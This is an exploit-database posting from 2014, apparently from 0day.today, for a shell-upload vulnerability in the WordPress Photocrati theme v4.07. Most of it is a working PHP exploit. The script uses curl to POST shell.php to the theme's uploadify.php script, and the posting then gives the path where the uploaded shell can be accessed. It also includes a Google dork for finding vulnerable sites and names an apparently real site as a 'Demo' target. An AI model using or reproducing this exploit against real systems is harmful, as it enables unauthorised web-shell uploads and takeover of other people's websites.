id: 22250
date: 05/14/2014
title: Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability
author: Aloulou
cves: 

############################################################################

# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability    

# Author : Aloulou                                              

# Date : 13/05/2014                                                     

# Facebook : http://www.facebook.com/Aloulou.TN                                

# Email: aloulou@alquds.com

# Vendor : www.photocrati.com                                                        

# Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/

# Tested on : Linux                        


############################################################################



Exploit: 

<?php
  
$uploadfile="shell.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",'folder'=>'/admin/scripts/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
  print "$postResult";
?>

ShellAccess:

    http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php

Demo:http://www.tanguygilson.com

# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy 


############################################################################

#  0day.today [2023-03-23]  #